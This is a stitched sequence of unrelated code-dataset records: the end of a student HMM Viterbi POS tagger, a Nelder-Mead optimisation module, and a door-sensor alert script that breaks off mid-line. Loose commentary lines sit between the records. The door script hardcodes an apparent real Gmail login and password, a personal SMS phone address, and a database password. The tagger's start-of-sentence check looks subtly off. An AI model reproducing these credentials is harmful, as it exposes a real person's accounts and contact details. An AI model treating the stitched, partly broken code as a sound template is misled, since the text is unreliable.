TAG1 exists in dataset\n #example: number of times a noun occured before adjective / total number of times a noun occurred\n\n #Calculation the possible tags for each word in the train dataset\n tags_of_tokens = {}\n count=0\n for sent in train_dataset:\n for (word,tag) in sent:\n word=word.lower()\n try:\n if tag not in tags_of_tokens[word]:\n tags_of_tokens[word].append(tag)\n except:\n list_of_tags = []\n list_of_tags.append(tag)\n tags_of_tokens[word] = list_of_tags\n #Each word and its corresponding tags in the train dataset\n\n # Getting words and their corresponding tags from the test set\n # Seperating the test data into test words and test tags\n test_words=[]\n test_tags=[]\n for sent in test_dataset:\n temp_word=[]\n temp_tag=[]\n for (word,tag) in sent:\n temp_word.append(word.lower()) # words of a sentence in test dataset\n temp_tag.append(tag) # tags of a sentence in test dataset\n test_words.append(temp_word) # list with words of a sentence(tokenized sentence) appended to a list of list\n test_tags.append(temp_tag) # list with 
tags of a sentence(tokenized sentence) appended to a list of list\n\n #VITERBI ALGORITHM IMPLEMENTATION\n# For each word in a sentence\n# – The probability of best candidates for each tag at previous level is\n# multiplied with the emission probability and the transition\n# probability of possible tags based on current word\n# – The best candidate for each tag at the current level is chosen and\n# the previous tag is kept a track of for backtracking\n# – The result of forward propagation at each level looks like the\n# following\n# LEVEL_K:{TAG1:{best_candidate_among_Tag1,probability_of the\n# best candidate} , {TAG2:{previous_tag_of_best_candidate_\n# among_Tag2, probability_of the best candidate}, ...}\n# – When backtracking start from the end to start choosing the\n# predicted tag based on LEVEL information and the predicted tag\n# that follows the word.\n# – In case an unseen word arrives the next tag is set to ‘NOUN’ and\n# the emission probability is set to a low probability (0.0001). This is\n# based on the observation from the corpus that ≈ 63% of the\n# unseen words were noun.\n predicted_tags = [] #Final list for prediction\n for i in range(len(test_words)): # for each tokenized sentence in the test data (test_words is a list of lists)\n sent = test_words[i]\n #storing_values is a dictionary which stores the required values\n #ex: storing_values = {step_no.:{state1:[previous_best_state,value_of_the_state]}} \n storing_values = {} \n for q in range(len(sent)):\n step = sent[q]\n #for the starting word of the sentence\n if q == 1: \n storing_values[q] = {}\n try:\n tags = tags_of_tokens[step]\n except:\n # print(step,test_tags_of_tokens[step])\n tags=['NOUN'] #tags_of_unseen_tokens\n for t in tags:\n #this is applied since we do not know whether the word in the test data is present in train data or not\n try:\n storing_values[q][t] = ['^^',bigram_tag_prob['^^'][t]*train_emission_prob[t][step]]\n #if word is not present in the train data but present in test data we assign a very low probability of 0.0001\n except:\n storing_values[q][t] = ['^^',0.0001]\n \n #if the word is not at the start of the sentence\n if q>1:\n storing_values[q] = {}\n previous_states = list(storing_values[q-1].keys()) # loading the previous states\n try:\n current_states = tags_of_tokens[step] # loading the current states\n except:\n current_states = ['NOUN']#tags_of_unseen_tokens\n #calculation of the best previous state for each current state and then storing\n #it in storing_values\n for t in current_states: \n temp = []\n for pt in previous_states: \n try:\n temp.append(storing_values[q-1][pt][1]*bigram_tag_prob[pt][t]*train_emission_prob[t][step]) # If seen word\n except:\n temp.append(storing_values[q-1][pt][1]*0.0001)\n max_temp_index = temp.index(max(temp))\n best_pt = previous_states[max_temp_index]\n storing_values[q][t]=[best_pt,max(temp)] #Store the best previous tag for each best candidate per tag and the meximum probability\n \n #Backtracing to extract the best possible tags for the sentence\n # for each word looking the current word and the word and tag next to it in the sentence backtrack\n # to get the tag of current word\n pred_tags = [] #predicted tags by viterbi using backtracking\n total_steps_num = storing_values.keys()\n last_step_num = max(total_steps_num) # Begin from the last word which will end the delimiter\n for bs in range(len(total_steps_num)): \n step_num = last_step_num - bs \n if step_num == last_step_num:\n pred_tags.append('$$')\n 
pred_tags.append(storing_values[step_num]['$$'][0]) \n if step_num < last_step_num and step_num > 0:\n pred_tags.append(storing_values[step_num][pred_tags[len(pred_tags)-1]][0]) #Looking into storing value fetch the best previous tag for the current word\n predicted_tags.append(list(reversed(pred_tags)))\n\n\n#Now that the tags are predicted, get the actual and predicted tags so that analysis can be done\n tag_seq_act=[]\n tag_seq_pred=[]\n uniq_tag=set()\n uniq_tag_dict={}\n for li in test_tags:\n for tag in li:\n if(tag!=\"^^\" and tag!=\"$$\"): #Exclude delimiters\n tag_seq_act.append(tag)\n\n for li in predicted_tags:\n for tag in li:\n if(tag!=\"^^\" and tag!=\"$$\"): #Exclude delimiters\n tag_seq_pred.append(tag)\n \n for tag in tag_seq_act:\n uniq_tag.add(tag)\n\n uniq_tag=list(uniq_tag)\n \n for i in range(len(uniq_tag)):\n uniq_tag_dict[uniq_tag[i]]=i\n \n for i,tag in enumerate(tag_seq_act):\n tag_seq_act[i]=uniq_tag_dict[tag]\n\n for i,tag in enumerate(tag_seq_pred):\n tag_seq_pred[i]=uniq_tag_dict[tag]\n\n# Calculate the precision, Recall and F-Scores by comparing the actual and predicted tags\n matched_tags=0\n for i in range(len(tag_seq_act)):\n if tag_seq_act[i]==tag_seq_pred[i]:\n matched_tags+=1\n # Estimations for the current set\n precision=matched_tags/(len(tag_seq_pred))\n recall=matched_tags/(len(tag_seq_act))\n F1_score=(2*precision*recall)/(precision+recall)\n F05_score=(1.25*precision*recall)/(0.25*precision+recall)\n F2_score=(5*precision*recall)/(4*precision+recall)\n # A confusion matrix is created which is used to display the confusion matrix and for per pos evaluation\n conf_matrix=confusion_matrix(tag_seq_act,tag_seq_pred)\n pos_estimation=per_POS_evaluation(conf_matrix, uniq_tag)\n\n #Store every set's estimations\n precision_sets[setno]=precision\n recall_sets[setno]=recall\n F1_score_sets[setno]=F1_score\n F05_score_sets[setno]=F05_score\n F2_score_sets[setno]=F2_score\n pos_estimation_sets[setno]=pos_estimation\n print(\"Set \",setno+1,\"✓\")\n\n# After getting every set's estimations combine them\n# For k fold cross validation\n# mean(each of the k set estimations) ± standard_error(each of the k set estimations)\n# standard_error= standard_deviation/square_root(k)\n# example Overall precision=(Σ precision_set i)/5 ± squareroot([Σ(precision_set_i-precision_mean)²]/5) here 5 for 5 fold cross validation\nprint(\"===================\\nOVERALL ESTIMATIONS\\n===================\")\nprint(\"Overall Precision:\", \"{:.6f}\".format(statistics.mean(precision_sets)),\"±\",\"{:.6f}\".format(statistics.stdev(precision_sets)/math.sqrt(setno+1)))\nprint(\"Overall Recall:\" ,\"{:.6f}\".format(statistics.mean(recall_sets)),\"±\",\"{:.6f}\".format(statistics.stdev(recall_sets)/math.sqrt(setno+1)))\nprint(\"Overall F1 Score:\", \"{:.6f}\".format(statistics.mean(F1_score_sets)),\"±\",\"{:.6f}\".format(statistics.stdev(F1_score_sets)/math.sqrt(setno+1)))\nprint(\"Overall F0.5 Score:\", \"{:.6f}\".format(statistics.mean(F05_score_sets)),\"±\",\"{:.6f}\".format(statistics.stdev(F05_score_sets)/math.sqrt(setno+1)))\nprint(\"Overall F2 Score:\", \"{:.6f}\".format(statistics.mean(F2_score_sets)),\"±\",\"{:.6f}\".format(statistics.stdev(F2_score_sets)/math.sqrt(setno+1)))\nmean_POS_est=(pos_estimation_sets[0]+pos_estimation_sets[1]+pos_estimation_sets[2]+pos_estimation_sets[3]+pos_estimation_sets[4])/5\nse_POS_est=np.sqrt((pos_estimation_sets[0]-mean_POS_est)**2+(pos_estimation_sets[1]-mean_POS_est)**2+(pos_estimation_sets[2]-mean_POS_est)**2+(pos_estimation_sets[3]-mean_POS_est)**2+(pos_estimation_sets[4]-mean_POS_est)**2)/5\nprint(\"\\n===============\\nPOS ESTIMATIONS\\n===============\\n++++\\nMEAN\\n++++\\n\",mean_POS_est,\"\\n++++++++++++++\\nSTANDARD ERROR\\n++++++++++++++\\n\",se_POS_est)\n\nprint(\"\\n\\nThe confusion matrix of set \",setno+1,\" will be displayed\")\n#Here confusion matrix for the set 5 is shown\ndisplay_conf_matrix(conf_matrix, uniq_tag)\n#Following line is used to show the confusion matrix when the code is run on terminal, can be commented if using jupyter notebooks \nmatplotlib.pyplot.show()\n","sub_path":"Assignment1 Submission/HMM/hmm_viterbi.py","file_name":"hmm_viterbi.py","file_ext":"py","file_size_in_byte":16630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
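As a hedged cross-check on per_POS_evaluation, sklearn can compute the same per-tag precision, recall and F1 directly from the integer label sequences of the last fold (tag_seq_act, tag_seq_pred and uniq_tag as left by the loop above):

from sklearn.metrics import precision_recall_fscore_support

prec, rec, f1, support = precision_recall_fscore_support(
    tag_seq_act, tag_seq_pred, labels=list(range(len(uniq_tag))), zero_division=0)
for tag, p, r, f in zip(uniq_tag, prec, rec, f1):
    print("%s: P=%.3f R=%.3f F1=%.3f" % (tag, p, r, f))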
+{"seq_id":"67192178","text":"# Copyright 2020 Yalfoosh\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nfrom typing import Optional, Tuple, Union\n\nimport numpy as np\n\nfrom . import constants\nfrom .function import Function\n\n\ndef clean_nelder_mead_simplex_search_arguments(\n function: Function,\n alpha: float,\n beta: float,\n gamma: float,\n sigma: float,\n use_jakobovic_expand: bool,\n epsilon: float,\n max_iterations: int,\n verbosity: Optional[str],\n decimal_precision: int,\n) -> Tuple[Function, float, float, float, float, bool, float, int, int, int]:\n \"\"\"\n Checks the Nelder Mead Simplex Search arguments and returns them prepared for work.\n\n Args:\n function (Function): A Function representing the loss function.\n alpha (float): A float used in point reflection.\n beta (float): A float used in point contraction.\n gamma (float): A float used in point expansion.\n sigma (float): A float used when moving points to the optimum.\n use_jakobovic_expand (bool): A bool determining whether or not to use the\n __expand_jakobovic method instead of the __expand method for point expansion.\n Defaults to False.\n epsilon (float): A float representing the error threshold.\n max_iterations (int): An int representing the maximum number of iterations\n before the algorithm times out and returns the last found optimum.\n verbosity (Optional[str]): A str representing the verbosity of the output during\n algorithm execution.\n decimal_precision (int): An int representing the number of decimal digits to\n round numbers outputted during algorithm execution.\n\n Raises:\n TypeError: Raised if argument function is not a Function.\n TypeError: Raised if argument alpha is not a float.\n TypeError: Raised if argument beta is not a float.\n TypeError: Raised if argument gamma is not a float.\n TypeError: Raised if argument sigma is not a float.\n TypeError: Raised if argument use_jakobovic_expand is not a bool.\n TypeError: Raised if argument epsilon is not a float.\n ValueError: Raised if argument epsilon is a negative number.\n TypeError: Raised if argument max_iterations is not an int.\n ValueError: Raised if argument max_iterations is a negative number.\n TypeError: Raised if argument verbosity is not a str.\n KeyError: Raised if argument verbosity is an invalid key.\n TypeError: Raised if argument decimal_precision is not an int.\n ValueError: Raised if argument decimal_precision is a negative number.\n\n Returns:\n Tuple[Function, float, float, float, float, bool, float, int, int, int]: Cleaned\n arguments.\n \"\"\"\n if not isinstance(function, Function):\n raise TypeError(\n \"Expected argument function to be a Function, instead it is \"\n f\"{type(function)}.\"\n )\n\n if isinstance(alpha, int):\n alpha = float(alpha)\n\n if not isinstance(alpha, float):\n raise TypeError(\n \"Expected argument alpha to be a float, instead it is \" f\"{type(alpha)}.\"\n )\n\n if isinstance(beta, int):\n beta = float(beta)\n\n if not isinstance(beta, float):\n raise TypeError(\n \"Expected 
argument beta to be a float, instead it is \" f\"{type(beta)}.\"\n )\n\n if isinstance(gamma, int):\n gamma = float(gamma)\n\n if not isinstance(gamma, float):\n raise TypeError(\n \"Expected argument gamma to be a float, instead it is \" f\"{type(gamma)}.\"\n )\n\n if isinstance(sigma, int):\n sigma = float(sigma)\n\n if not isinstance(sigma, float):\n raise TypeError(\n \"Expected argument sigma to be a float, instead it is \" f\"{type(sigma)}.\"\n )\n\n if not isinstance(use_jakobovic_expand, bool):\n raise TypeError(\n \"Expected argument use_jakobovic_expand to be a bool, instead it is \"\n f\"{type(use_jakobovic_expand)}.\"\n )\n\n if not isinstance(epsilon, float):\n raise TypeError(\n \"Expected argument epsilon to be a float, instead it is \"\n f\"{type(epsilon)}.\"\n )\n\n if epsilon < 0:\n raise ValueError(\n \"Expected argument epsilon to be a positive float, instead it is \"\n f\"{epsilon}.\"\n )\n\n if not isinstance(max_iterations, int):\n raise TypeError(\n \"Expected argument max_interations to be an int, instead it is \"\n f\"{type(max_iterations)}.\"\n )\n\n if max_iterations < 1:\n raise ValueError(\n \"Expected argument max_interations to be a positive integer, instead it is \"\n f\"{max_iterations}.\"\n )\n\n if verbosity is None:\n verbosity = \"none\"\n\n if not isinstance(verbosity, str):\n raise TypeError(\n f\"Expected argument verbosity to be a str, instead it is {type(verbosity)}.\"\n )\n\n if verbosity not in constants.NELDER_MEAD_SIMPLEX_VERBOSITY_DICT:\n verbosity_dict_length = len(constants.NELDER_MEAD_SIMPLEX_VERBOSITY_DICT)\n\n if verbosity_dict_length == 0:\n verbosity_string = \"There are no keys available.\"\n elif verbosity_dict_length == 1:\n _key = list(constants.NELDER_MEAD_SIMPLEX_VERBOSITY_DICT.keys())[0]\n verbosity_string = f'The only available key is \"{_key}\".'\n else:\n _keys = list(sorted(constants.NELDER_MEAD_SIMPLEX_VERBOSITY_DICT.keys()))\n verbosity_string = \"The available keys are \"\n verbosity_string += \", \".join([str(f'\"{x}\"') for x in _keys[:-1]])\n verbosity_string += f' and \"{_keys[-1]}\"\".'\n\n raise KeyError(\n f'Verbosity key \"{verbosity}\" is not in the Nelder Mead Simplex Verbosity '\n f\"dictionary. 
{verbosity_string}\"\n )\n\n verbosity = constants.NELDER_MEAD_SIMPLEX_VERBOSITY_DICT[verbosity]\n\n if not isinstance(decimal_precision, int):\n raise TypeError(\n \"Expected argument decimal_precision to be an int, instead it is \"\n f\"{type(decimal_precision)}.\"\n )\n\n if decimal_precision < 1:\n raise ValueError(\n \"Expected argument decimal_precision to be a positive int, instead it is\"\n f\"{decimal_precision}.\"\n )\n\n return (\n function,\n alpha,\n beta,\n gamma,\n sigma,\n use_jakobovic_expand,\n epsilon,\n max_iterations,\n verbosity,\n decimal_precision,\n )\n\n\ndef clean_get_simplex_points(\n start: np.ndarray, stride: Union[float, int]\n) -> Tuple[np.ndarray, float]:\n \"\"\"\n Checks the __get_simplex_points arguments and returns them prepared for work.\n\n Args:\n start (np.ndarray): A numpy.ndarray representing the starting point for simplex\n generation.\n stride (Union[float, int]): A float or int representing the stride.\n\n Raises:\n TypeError: Raised if argument start is not a numpy.ndarray.\n ValueError: Raised if argument start is a zero-length vector.\n TypeError: Raised if argument stride is not a float or int.\n\n Returns:\n Tuple[np.ndarray, float]: Cleaned arguments.\n \"\"\"\n if not isinstance(start, np.ndarray):\n raise TypeError(\n \"Expected argument start to be a numpy.ndarray, instead it is \"\n f\"{type(start)}.\"\n )\n\n start = np.reshape(start, -1)\n\n if start.shape[0] == 0:\n raise ValueError(\n \"Expected argument starting point to be a vector with at least one \"\n \"element, instead it is empty.\"\n )\n\n if not isinstance(stride, (float, int)):\n raise TypeError(\n \"Expected argument stride to be a float or int, instead it is \"\n f\"{type(stride)}.\"\n )\n\n stride = float(stride)\n\n return start, stride\n\n\ndef __get_simplex_points(start: np.ndarray, stride: float) -> np.ndarray:\n \"\"\"\n Generates simplex points for a starting point.\n\n Args:\n start (np.ndarray): A numpy.ndarray representing the starting point for simplex\n generation.\n stride (float): A float representing the stride.\n\n Returns:\n np.ndarray: A matrix with each row representing a point of the simplex.\n \"\"\"\n\n points = np.tile(start, reps=(start.shape[0], 1))\n points = points + stride * np.eye(points.shape[0])\n\n return np.vstack([start, points])\n\n\ndef __reflect(\n centroid: np.ndarray, maximum_point: np.ndarray, alpha: float\n) -> np.ndarray:\n \"\"\"\n Reflects argument maximum_points wrt centroid by argument alpha.\n\n Args:\n centroid (np.ndarray): A numpy.ndarray representing the simplex centroid.\n maximum_point (np.ndarray): A numpy.ndarray representing the worst point of a\n simplex.\n alpha (float): A float representing the amount a point will be reflected.\n\n Returns:\n np.ndarray: A numpy.ndarray representing the reflected point.\n \"\"\"\n return (1 + alpha) * centroid - alpha * maximum_point\n\n\ndef __contract(\n centroid: np.ndarray, maximum_point: np.ndarray, beta: float\n) -> np.ndarray:\n \"\"\"\n Contracts argument maximum_points wrt centroid by argument beta.\n\n Args:\n centroid (np.ndarray): A numpy.ndarray representing the simplex centroid.\n maximum_point (np.ndarray): A numpy.ndarray representing the worst point of a\n simplex.\n beta (float): A float representing the amount a point will be contracted.\n\n Returns:\n np.ndarray: A numpy.ndarray representing the contracted point.\n \"\"\"\n return (1 - beta) * centroid + beta * maximum_point\n\n\ndef __expand(\n centroid: np.ndarray, reflected_point: np.ndarray, gamma: 
float\n) -> np.ndarray:\n \"\"\"\n Expands argument reflected_point wrt centroid by argument alpha.\n\n Args:\n centroid (np.ndarray): A numpy.ndarray representing the simplex centroid.\n maximum_point (np.ndarray): A numpy.ndarray representing the worst point of a\n simplex.\n gamma (float): A float representing the amount a point will be expanded.\n\n Returns:\n np.ndarray: A numpy.ndarray representing the expanded point.\n \"\"\"\n return (1 - gamma) * centroid + gamma * reflected_point\n\n\ndef __expand_jakobovic(\n centroid: np.ndarray, reflected_point: np.ndarray, gamma: float\n) -> np.ndarray:\n \"\"\"\n Expands argument reflected_point wrt centroid by argument alpha. This is a modified\n version which is supposedly the correct one, as said by prof. Jakobović.\n\n Args:\n centroid (np.ndarray): A numpy.ndarray representing the simplex centroid.\n maximum_point (np.ndarray): A numpy.ndarray representing the worst point of a\n simplex.\n gamma (float): A float representing the amount a point will be expanded.\n\n Returns:\n np.ndarray: A numpy.ndarray representing the expanded point.\n \"\"\"\n return (1 - gamma) * centroid - gamma * reflected_point\n\n\ndef __time_to_stop(\n simplex_values: np.ndarray, centroid_value: float, epsilon: float\n) -> bool:\n \"\"\"\n Checks if it's time to stop Nelder Mead Simplex Search.\n\n Args:\n simplex_values (np.ndarray): A numpy.ndarray representing the vector of simplex\n values.\n centroid_value (float): A float representing the value of the simplex centroid.\n epsilon (float): A float representing the error threshold.\n\n Returns:\n bool: True if the stopping condition of Nelder Mead Simplex Search has been met,\n False otherwise.\n \"\"\"\n difference_in_values = simplex_values - centroid_value\n squared_difference_in_values = np.square(difference_in_values)\n mean_squared_difference_in_values = np.mean(squared_difference_in_values)\n\n return np.sqrt(mean_squared_difference_in_values) <= epsilon\n\n\ndef __print_nmss_values(\n function: Function,\n centroid: np.ndarray,\n verbosity: int,\n decimal_precision: int,\n):\n \"\"\"\n Prints the Nelder Mead Simplex Search values.\n\n Args:\n function (Function): A Function representing the loss function.\n centroid (np.ndarray): A numpy.ndarray representing the simplex centroid.\n verbosity (int): An int representing the level of verbosity of the output during\n algorithm execution.\n decimal_precision (int): An int representing the number of decimal digits to\n round numbers outputted during algorithm execution.\n \"\"\"\n if verbosity == 1:\n print(f\"c = {np.around(centroid, decimal_precision)}\")\n elif verbosity > 1:\n result = function(centroid, dont_count=True)\n result = (\n np.around(result, 3)\n if isinstance(result, np.ndarray)\n else f\"{result:.0{decimal_precision}f}\"\n )\n\n print(f\"F(c = {np.around(centroid, decimal_precision)}) = {result}\")\n\n\ndef nelder_mead_simplex_search(\n function: Function,\n start: np.ndarray,\n stride: Union[float, int] = 1,\n alpha: float = 1.0,\n beta: float = 0.5,\n gamma: float = 2.0,\n sigma: float = 0.5,\n use_jakobovic_expand: bool = False,\n epsilon: float = 1e-6,\n max_iterations: int = 100000,\n verbosity: Optional[str] = None,\n decimal_precision: int = 3,\n) -> np.ndarray:\n \"\"\"\n Uses Nelder Mead Simplex Search to find an n-D optimum of a function.\n\n Args:\n function (Function): A Function representing the loss function.\n start (np.ndarray): A numpy.ndarray representing the starting point of the\n search.\n stride (Union[float, int], 
optional): A float or int representing the stride for\n simplex generation. Defaults to 1.\n alpha (float, optional): A float used in point reflection. Defaults to 1.0.\n beta (float, optional): A float used in point contraction. Defaults to 0.5.\n gamma (float, optional): A float used in point expansion. Defaults to 2.0.\n sigma (float, optional): A float used when moving points to the optimum.\n Defaults to 0.5.\n use_jakobovic_expand (float, optional): A bool determining whether or not to use\n the __expand_jakobovic method instead of the __expand method for point\n expansion. Defaults to False.\n epsilon (float, optional): A float representing the error threshold. Defaults to\n 1e-6.\n max_iterations (int, optional): An int representing the maximum number of\n iterations before the algorithm times out and returns the last found optimum.\n Defaults to 100000.\n verbosity (Optional[str], optional): A str representing the verbosity of the\n output during algorithm execution. Defaults to None (no output during algorithm\n execution).\n decimal_precision (int, optional): An int representing the number of decimal\n digits to round numbers outputted during algorithm execution. Defaults to 3.\n\n Returns:\n np.ndarray: A numpy.ndarray representing the last found optimum.\n \"\"\"\n (\n function,\n alpha,\n beta,\n gamma,\n sigma,\n use_jakobovic_expand,\n epsilon,\n max_iterations,\n verbosity,\n decimal_precision,\n ) = clean_nelder_mead_simplex_search_arguments(\n function=function,\n alpha=alpha,\n beta=beta,\n gamma=gamma,\n sigma=sigma,\n use_jakobovic_expand=use_jakobovic_expand,\n epsilon=epsilon,\n max_iterations=max_iterations,\n verbosity=verbosity,\n decimal_precision=decimal_precision,\n )\n start, stride = clean_get_simplex_points(start=start, stride=stride)\n\n simplex_points = __get_simplex_points(start=start, stride=stride)\n simplex_values = np.array([function(x) for x in simplex_points])\n\n timed_out = True\n\n expansion_method = __expand_jakobovic if use_jakobovic_expand else __expand\n\n for _ in range(max_iterations):\n minimum_index = np.argmin(simplex_values)\n maximum_index = np.argmax(simplex_values)\n centroid = np.mean(np.delete(simplex_points, maximum_index, axis=0), axis=0)\n\n __print_nmss_values(\n function=function,\n centroid=centroid,\n verbosity=verbosity,\n decimal_precision=decimal_precision,\n )\n\n reflected_point = __reflect(\n centroid=centroid, maximum_point=simplex_points[maximum_index], alpha=alpha\n )\n\n reflected_value = function(reflected_point)\n minimum_value = simplex_values[minimum_index]\n\n if reflected_value < minimum_value:\n expanded_point = expansion_method(\n centroid=centroid, reflected_point=reflected_point, gamma=gamma\n )\n expanded_value = function(expanded_point)\n\n if expanded_value < minimum_value:\n simplex_points[maximum_index] = expanded_point\n simplex_values[maximum_index] = expanded_value\n else:\n simplex_points[maximum_index] = reflected_point\n simplex_values[maximum_index] = reflected_value\n else:\n maximum_value = simplex_values[maximum_index]\n\n if all(np.delete(simplex_values, maximum_index, axis=0) < reflected_value):\n if reflected_value < maximum_value:\n simplex_points[maximum_index] = reflected_point\n simplex_values[maximum_index] = reflected_value\n\n # We need this here since we're introducing a new point and value\n minimum_index = np.argmin(simplex_values)\n maximum_index = np.argmax(simplex_values)\n\n # We need to do this since the maximum value has potentially changed\n maximum_value = 
simplex_values[maximum_index]\n\n contracted_point = __contract(\n centroid=centroid,\n maximum_point=simplex_points[maximum_index],\n beta=beta,\n )\n contracted_value = function(contracted_point)\n\n if contracted_value < maximum_value:\n simplex_points[maximum_index] = contracted_point\n simplex_values[maximum_index] = contracted_value\n else:\n for i, simplex_point in enumerate(simplex_points):\n if i == minimum_index:\n continue\n\n simplex_points[i] += (\n simplex_points[minimum_index] - simplex_points[i]\n ) * sigma\n simplex_values[i] = function(simplex_points[i])\n else:\n simplex_points[maximum_index] = reflected_point\n simplex_values[maximum_index] = reflected_value\n\n if __time_to_stop(\n simplex_values=simplex_values,\n centroid_value=function(centroid),\n epsilon=epsilon,\n ):\n timed_out = False\n break\n\n if timed_out:\n print(\n f\"WARNING: Nelder Mead Simplex Search timed out after {max_iterations} \"\n \"iterations - result might not be a minimum.\",\n file=sys.stderr,\n )\n\n # Do this to get a more precise result\n maximum_index = np.argmax(simplex_values)\n centroid = np.mean(np.delete(simplex_points, maximum_index, axis=0), axis=0)\n\n return centroid\n","sub_path":"dz/dz-02/src/searches/nelder_mead.py","file_name":"nelder_mead.py","file_ext":"py","file_size_in_byte":19872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
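A minimal usage sketch for the search above. It assumes the package's Function wrapper can be constructed from a plain callable, which this excerpt does not show, so treat the constructor call as hypothetical:

import numpy as np

# Hypothetical wrapper around a shifted quadratic; the real Function API may differ.
f = Function(lambda x: (x[0] - 1.0) ** 2 + (x[1] + 2.0) ** 2)

optimum = nelder_mead_simplex_search(f, start=np.array([0.0, 0.0]))
print(optimum)  # expected to converge near [1, -2]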
+{"seq_id":"183170991","text":"__author__ = 'joelwhitney'\n# SIE 558 - Final Take - Query for events and send emails\n# this file:\n# 1) def function for sending messages\n# 2) def main function (re-run every ~1 sec)\n # 3) open connection to mysql db\n # 4) grab most recent tuple for each door\n # 5) check doors for open/close scenarios\n\n# goal check if any door is open longer than threshold\n # outsideDoor > 45 seconds\n # kitchenDoor > 45 seconds\n # freezerDoor > 45 seconds\n # refrigeratorDoor > 45 seconds\n\n# imports\nimport time\nimport datetime\nimport pymysql\nimport smtplib\n\ndef sendMessage(msg):\n # gmail credentials\n username = 'whitney.joel.b@gmail.com'\n password = 'Raptor5099'\n fromaddr = 'Joel Whitney'\n toaddrs = '2072499538@txt.att.net'\n\n # The actual mail send. 'msg' can't have symbols, just plain text\n server = smtplib.SMTP('smtp.gmail.com:587')\n server.starttls()\n server.login(username,password)\n server.sendmail(fromaddr, toaddrs, str(msg))\n server.quit()\n\ndef main():\n # set some variables as lists to match up with for loop for each door(i) (outside, kitchen, freezer, refrigerator)\n # last fid for each door - only compares different fid's\n lastfid = [0, 0, 0, 0]\n # set event statuses to closed (1) - used to check if opened\n eventStatus = ['1', '1', '1', '1']\n # set the tresholds as time in seconds - used as thresholds for alerts\n threshold = [45, 45, 45, 45]\n # set the counters - used to check how many times same event has been opened and resends bsaed on occurenceAlert factor\n counter = [0, 0, 0, 0]\n # set re-occurrence alert factor (this will check if seconds since insertTime is evenly divisible by below)\n occurrenceAlert = 300\n # messages list with items as list\n door1Message = [('NEW EVENT OutsideDoor open >' + str(threshold[0]) + 'seconds!'), ('EVENT CONT OutsideDoor still open') , ('EVENT CLOSED OutsideDoor closed')]\n door2Message = [('NEW EVENT KitchenDoor open >' + str(threshold[1]) + 'seconds!'), ('EVENT CONT KitchenDoor still open') , ('EVENT CLOSED KitchenDoor closed')]\n door3Message = [('NEW EVENT Freezer open >' + str(threshold[2]) + 'seconds!'), ('EVENT CONT Freezer still open') , ('EVENT CLOSED Freezer closed')]\n door4Message = [('NEW EVENT Refrigerator open >' + str(threshold[3]) + 'seconds!'), ('EVENT CONT Refrigerator still open') , ('EVENT CLOSED Refrigerator closed')]\n message = [door1Message, door2Message, door3Message, door4Message]\n\n # open file to write tuples to and start while loop to recursively run checks\n with open('eventOutput.txt', 'w') as f:\n while True:\n # 1) open connection to mysql db\n # open a connection to the database\n cnx = pymysql.connect(host='localhost',\n port=3306,\n user='joelw',\n passwd='Raptor5099',\n db='SIE558FinalProject')\n\n # 2) grab most recent tuple for each door\n # sets up cursor object to interact with MYSQL connection\n cursor = cnx.cursor()\n\n # SQL select statements <- returns max tuple for each doorID\n query1 = \"SELECT * FROM SIE558FinalProject.DoorSensors d \" \\\n \"INNER JOIN (SELECT MAX(insertTime) AS max_insertTime \" \\\n \"FROM SIE558FinalProject.DoorSensors GROUP BY doorID\" \\\n \") e ON d.insertTime = e.max_insertTime WHERE d.doorID = '1'; \"\n query2 = \"SELECT * FROM SIE558FinalProject.DoorSensors d \" \\\n \"INNER JOIN (SELECT MAX(insertTime) AS max_insertTime \" \\\n \"FROM SIE558FinalProject.DoorSensors GROUP BY doorID\" \\\n \") e ON d.insertTime = e.max_insertTime WHERE d.doorID = '2'; \"\n query3 = \"SELECT * FROM SIE558FinalProject.DoorSensors d 
\" \\\n \"INNER JOIN (SELECT MAX(insertTime) AS max_insertTime \" \\\n \"FROM SIE558FinalProject.DoorSensors GROUP BY doorID\" \\\n \") e ON d.insertTime = e.max_insertTime WHERE d.doorID = '3'; \"\n query4 = \"SELECT * FROM SIE558FinalProject.DoorSensors d \" \\\n \"INNER JOIN (SELECT MAX(insertTime) AS max_insertTime \" \\\n \"FROM SIE558FinalProject.DoorSensors GROUP BY doorID\" \\\n \") e ON d.insertTime = e.max_insertTime WHERE d.doorID = '4'; \"\n queryList = [query1, query2, query3, query4]\n\n # use for loop to execute function on cursor and retrieve data from db for each query\n for i in range(len(queryList)):\n cursor.execute(queryList[i])\n #print(\"Query is:\", queryList[i])\n\n # DO THIS WITHOUT FOR LOOP CUZ ONLY 1 TUPLE WILL BE RETURNED\n for line in cursor:\n #print(line)\n fid = str(line[0])\n doorID = str(line[1])\n doorState = str(line[2])\n insertTime = line[3]\n\n\n if fid != lastfid[i]:\n # 3a) check door1 for open scenarios\n # if doorState1 is open\n if doorState == '0':\n # if eventStatus1 is closed\n if eventStatus[i] == '1':\n # if door1 is open longer than threshold1 (deltaTime1 of now() - insertTime > threshold1)\n a = datetime.datetime.strptime(insertTime, \"%Y-%m-%d %H:%M:%S.%f\")\n b = datetime.datetime.now()\n deltaTime = (b - a).total_seconds()\n #print(deltaTime)\n if deltaTime > threshold[i]:\n # send appropiate response \"Event is open\" and write to a different table within db (EventsTable)\n sendMessage(str(message[i][0]))\n print(str(message[i][0]) + \" (\" + str(datetime.datetime.now()) + \")\")\n # write tuple to file\n tuple = str(cursor) + ',' + str(message[i][0])\n f.write(tuple)\n # flush to make sure all writes are committed\n f.flush()\n # change eventStatus1 to open\n eventStatus[i] = '0'\n # counter1 += 1 <- this signifies occurrence of same event\n counter[i] += 1\n # update last fid\n lastfid[i] = fid\n # else if eventStatus1 is open\n elif eventStatus[i] == '0':\n # if counter1 / 60 seconds % 5 min = 0 <- if counter of occurrences is divisible by 5 send reminder\n if counter[i] % occurrenceAlert == 0:\n # do appropiate response and write to a different table within db (EventsTable)\n sendMessage(str(message[i][1]))\n print(message[i][1] + \" (\" + str(datetime.datetime.now()) + \")\")\n # write tuple to file\n tuple = str(cursor) + ',' + str(message[i][1])\n 